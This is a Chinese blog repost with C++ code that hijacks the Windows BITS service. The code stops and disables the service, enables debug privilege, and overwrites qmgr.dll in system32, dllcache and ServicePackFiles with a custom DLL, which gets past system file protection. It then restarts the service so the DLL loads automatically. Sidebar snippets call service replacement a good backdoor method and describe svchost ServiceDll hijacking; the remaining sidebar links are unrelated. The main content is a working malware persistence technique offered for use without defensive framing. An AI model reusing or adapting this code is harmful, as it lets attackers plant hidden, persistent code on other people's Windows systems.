替换BITS系统服务

最新推荐文章于 2021-08-11 13:00:17 发布
最新推荐文章于 2021-08-11 13:00:17 发布
阅读量947 收藏
点赞数
分类专栏: ssdt及驱动 文章标签: service null manager 工作 access token

替换BITS系统服务
2009-4-9 8:07:34 来源: 转载 作者:vips 录入:vips 访问:点击:276 次 次 被顶:118 次 字号:【大 中 小】
核心提示:替换BITS系统服务...
创建了一个类,提供三接口,一个用来启动服务,一个用来停止服务,一个用来调整启动方式滴

class CService
{
public:
BOOL SetStartType(DWORD dwOp);
void StopService();
void StartService();
CService(char* szSerName);
virtual ~CService();

private:
BOOL CloseHandle();
BOOL EnablePriv();
BOOL OpenHandle();
SC_HANDLE m_ser;
SC_HANDLE m_scm;
char m_szSerName[256];
};

实现部分的代码

CService::CService(char *szSerName)
{
memset(m_szSerName,0,256);
strcpy(m_szSerName,szSerName);
}

CService::~CService()
{

}

BOOL CService::OpenHandle()
{
BOOL stat=EnablePriv();
if(!stat)
return FALSE;
m_scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE);
if(m_scm==NULL)
{
return FALSE;
}
m_ser=OpenService(m_scm,m_szSerName,SERVICE_ALL_ACCESS);
if(m_ser==NULL)
{
return FALSE;
}
else
return TRUE;
}

BOOL CService::EnablePriv()
{
HANDLE hToken;
BOOL stat;
stat=OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
if(stat==FALSE)
return FALSE;

TOKEN_PRIVILEGES tkp;

stat=LookupPrivilegeValue( NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid );//修改进程权限
if(stat==FALSE)
return FALSE;
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
stat=AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL );//通知系统修改进程权限

return stat;
}

BOOL CService::CloseHandle()
{
return (CloseServiceHandle(m_scm)&&CloseServiceHandle(m_ser));
}

void CService::StartService()
{
EnablePriv();
OpenHandle();
::StartService(m_ser,NULL,NULL);
CloseHandle();
}

void CService::StopService()
{
EnablePriv();
OpenHandle();
SERVICE_STATUS stat;
ControlService(m_ser,SERVICE_CONTROL_STOP,&stat);
CloseHandle();
}

BOOL CService::SetStartType(DWORD dwOp)//SERVICE_AUTO_START SERVICE_BOOT_START SERVICE_DEMAND_START SERVICE_DISABLED SERVICE_SYSTEM_START
{
OpenHandle();
SC_LOCK sclLock=LockServiceDatabase(m_scm);
BOOL stat=ChangeServiceConfig(
m_ser,
SERVICE_NO_CHANGE,
dwOp,
SERVICE_NO_CHANGE,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL);
UnlockServiceDatabase(sclLock);
CloseHandle();
return stat;
}


替换程序相关的代码

void ReplaceService(char *szFilePath)//szFilePath是我们自己的DLL文件的位置
{
char temp[256]={0};
GetWindowsDirectory(temp,256);
char szPackPath[256]={0};
strcpy(szPackPath,temp);
strcat(szPackPath,"//ServicePackFiles//i386//qmgr.dll");//这个东东貌似是XP sp3下才存在,开始的时候没注意,一直没替换成功,系统自动还原了,瘦了一下,发现这个地方还有一备份文件。替换了就好了
char szCachePath[256]={0};
strcpy(szCachePath,temp);
strcat(szCachePath,"//system32//dllcache//qmgr.dll");
char szSystemPath[256]={0};
strcpy(szSystemPath,temp);
strcat(szSystemPath,"//system32//qmgr.dll");

strcat(temp,"//qmgr.cfei");

MoveFileEx(szCachePath,temp,MOVEFILE_REPLACE_EXISTING);
MoveFileEx(szPackPath,temp,MOVEFILE_REPLACE_EXISTING);
MoveFileEx(szSystemPath,temp,MOVEFILE_REPLACE_EXISTING);
CopyFile(szFilePath,szCachePath,0);
CopyFile(szFilePath,szPackPath,0);
CopyFile(szFilePath,szSystemPath,0);
}


调用部分的代码

CService ser("bits");
ser.SetStartType(SERVICE_DISABLED);
ser.StopService();
ReplaceService("c://ser.dll");//这里假设我们的文件释放的位置是c:/ser.dll
ser.SetStartType(SERVICE_AUTO_START);
ser.StartService();


当BITS才开始就是启动状态时,系统重新启动后才可以正常工作,如果BITS服务才开始就是停止或者禁用状态,则可以直接工作

lionzl
关注
专栏目录
思科服务器如何重装系统,思科路由器系列软件安装与升级步骤
weixin_29063681的博客
08-06 1360
思科路由器系列软件安装与升级步骤更新时间:2007年09月19日 10:22:54 作者:介绍本文说明了接入路由器平台上的Cisco IOS软件镜像的升级步骤。2600与3600系列路由器的升级实例也适用于下文所列的路由器平台。Cisco IOS软件文件名可能会根据Cisco IOS软件版本、功能设定以及平台等情况而发生变化。本文说明的是以下Cisco系列路由器:Cisco 1000系列路由器...
服务器2012系统iso 驱动程序,【运维干货】Windows7/2008/2012系统镜像集成VirtIO驱动...
weixin_42468911的博客
08-07 949
原标题:【运维干货】Windows7/2008/2012系统镜像集成VirtIO驱动VirtIO驱动的简介:从 2006 年开始,KVM 上设备 I/O 虚拟化的性能问题也显现了出来,此时由 Rusty Russell 开发的 virtio 引起了开发者们的注意并逐渐被 KVM 等虚拟化平台接纳并作为了其 I/O 虚拟化最主要的一个通用框架。Virtio 使用 virtqueue 来实现其 I/O...
替换系统svchost服务自启动
06-14
替换Svchost共享服务模式启动,,原理是制作导出函数为ServiceMain的动态链接库文件,并在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\SvcHost\netsvcs中查找系统未安装的服务,创建服务后将 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XXX\Parameters\ServiceDll键值改为自己的动态链接库文件路径,实现自启动。
随机替换系统服务
yyue的专栏
06-12 1610
 Random Replace Service   RpSrv.exe 配置程序    rps.ini   配置文件    rps.exe   主运行文件        本程序可用来随机替换系统服务,程序RpSrv.exe用来设置RPS.ini,程序rps.exe运行时读取rps.ini中的配置替换相关的服务。配置文件中主文件名必须是可以作为系统服务运行的程序,如r_server.exe,且程序运
替换服务但原服务不失效的方法
tony的专栏
10-25 742
替换系统服务是做后门的一个好办法,ring3实现,稳定可靠,也具有一定的隐蔽性。这里简单说说怎么样使用自己的服务替换系统服务,并且保证原来真实的系统服务不失效。   替换服务,主要有两种常见的办法,第一是修改注册表中对应服务的可执行文件路径,第二个是直接替换服务文件。第一个办法的缺陷是修改注册表,第二个是需要关闭SFC。而他们共有的缺点是替换服务之后原来的老服务就失效了,以至没法替换系统关键服
BITS服务不启动的解决方法(win 10)(学习笔记一)
热门推荐
jiayou_chen的博客
07-12 1万+
BITS(后台传输服务)是一个windows组件,它可以在前台或后台异步传输文件,为保证其他网络应用程序获得响应调整网络中的传输速度,并且在计算机重新启动或者重新建立网络连接之后自动恢复文件的传输。 而BITS也是属于网络中的一种服务,又是也会存在着打不开或者突然停止工作的情况,而BITS服务的停止也会导致windows更新和微软商店无法正常的工作。 面对BITS服务的停止有着以下的几种解决方法 ...
启动bits工具
06-25
解决windows updrte不能更新的问题。
org.in2bits.MyXls.dll 插件
06-03
4. **数据处理**:支持数据排序、过滤、查找替换等常见的数据处理功能,便于进行数据清洗和分析。 5. **图表生成**:能够根据数据生成各种类型的图表,如柱状图、折线图、饼图等,便于数据可视化。 6. **宏支持**...
东南大学操作系统实验——实现LRU算法及其近似算法
06-30
在本实验中,学生将深入理解操作系统的内存管理机制,特别是LRU(Least Recently Used,最近最少使用)页面置换算法。LRU算法是一种常见的虚拟内存管理策略,它根据页面的使用历史来决定替换哪个页面。当内存中的...
Matlab 2013b Crack for 32bits &&64bits
08-27
Matlab 2013b Crack for 32bits &&64bits 破解教程: 参考里面的read me.txt文件 1.序列号见文档内,有两个,其中一个为备用 2.解压install_jar.rar,将matlab安装所在文件中java\jar\install.jar用解压文件中的...
bits不能在本地计算机启动,Win10 BITS服务无法启动的解决方法
weixin_36310141的博客
07-27 2892
Win10中的BITS服务(Background Intelligent Transfer Services服务)如果无法启动可能会导致系统一些问题,如系统卡住可能在你玩游戏的时候。也可能导致账户切换不成功,如本地帐户切换到Windows帐户,提示0x80070422,那么如何解决呢?下面小编给大家带来网官分享的方法。1、遇到0x80070422这样的错误,通常都是由于相关的服务无法启动导致的。不...
win2008服务系统 引导错误,启动 BITS 服务时出现错误 2147944102 - Windows Server | Microsoft Docs...
weixin_39553776的博客
08-11 614
"特定于服务的错误代码 -2147944102"错误消息(如果您尝试启动 BITS 服务)09/10/2020本文内容本文提供了一个解决方案,用于解决在启动 BITS) 服务后台智能传输服务时发生的错误 (2147944102。适用于: Windows Server 2012R2原始 KB 编号: 326460症状如果您尝试在安装了终端服务的基于 Windows 2000 的计算机上启动 B...
计算机服务找不到指定位置,BITS服务系统找不到指定的文件的解决办法
weixin_30853127的博客
07-29 660
BITS服务系统找不到指定的文件的解决办法发布时间:2012-07-16 15:58:12 作者:佚名 我要评论使用windows update的时候可以找到补丁,但开始下载补丁就直接停止,补丁没有下载。查看服务,发现缺少BITS服务,安装后无法启动,问题来了就来解决它吧。今天遇到一个机器,无法windows update,就帮助去解决了。情况是这样的:使用windows update的...
收集2:系统服务详解
weixin_33849215的博客
09-14 188
XP系统服务详解,这里应该比较全了,很多也比较详细,需要的可以找找看。。1.Alerter  Alerter(警示器)服务的进程名是Services.exe(即启动这个服务后在后台运行的进程的名称,可以通过任务管理器看到)。Alerter服务的功能是,WinXP将系统上发生的与管理有关的事件以警示(Alert)信息传送至网络上指定的电脑或用户,例如当发生打印错误或硬盘即将写满...
快速找出System.Management.Automation.dll,c#调用powershell
dibeichan3033的博客
05-19 819
public static void InvokeSystemPS(string cmd) { List<string> ps = new List<string>(); ps.Add("Set-ExecutionPolicy RemoteSigned"); ps...
重装windows update服务BITS服务
03-18 3269
前几天C盘空间出现问题,折腾了几下,空间倒是有了,遗憾的是付出了代价,windows自动更新坏了,windows update服务BITS服务都启动不了,因为我无意删除了一些系统文件。后来在微软的网站找到了重装这两个服务的方法,修好了机器。记录一下,备忘。 代码: rundll32.exe setupapi,InstallHinfSe
C++ 修改 Windows Service【转】
weixin_30783913的博客
08-10 196
原文:http://msdn.microsoft.com/en-us/library/windows/desktop/ms682006(v=vs.85).aspx // // Purpose: // Disables the service. // // Parameters: // None // // Return value: // None ...
Delphi启动/停止Windows服务,启动类型修改为"自动"
weixin_30654419的博客
04-02 191
unit U_StartServices;interfaceuses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, WinSVC, StdCtrls;type TForm1 = class(TForm) btn_StartServices: TButton...
#include<bits/stdc++.h>怎么变Linux系统上的gcc编译器上使用
最新发布
07-15
2. 在您的源代码文件中添加 `#include<bits/stdc++.h>` 是不推荐的做法,因为它是非标准的头文件,仅在一些特定的编译器环境中可用。通常建议只包含必要的标准库头文件。 3. 打开终端,导航到存储源代码文件的目录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值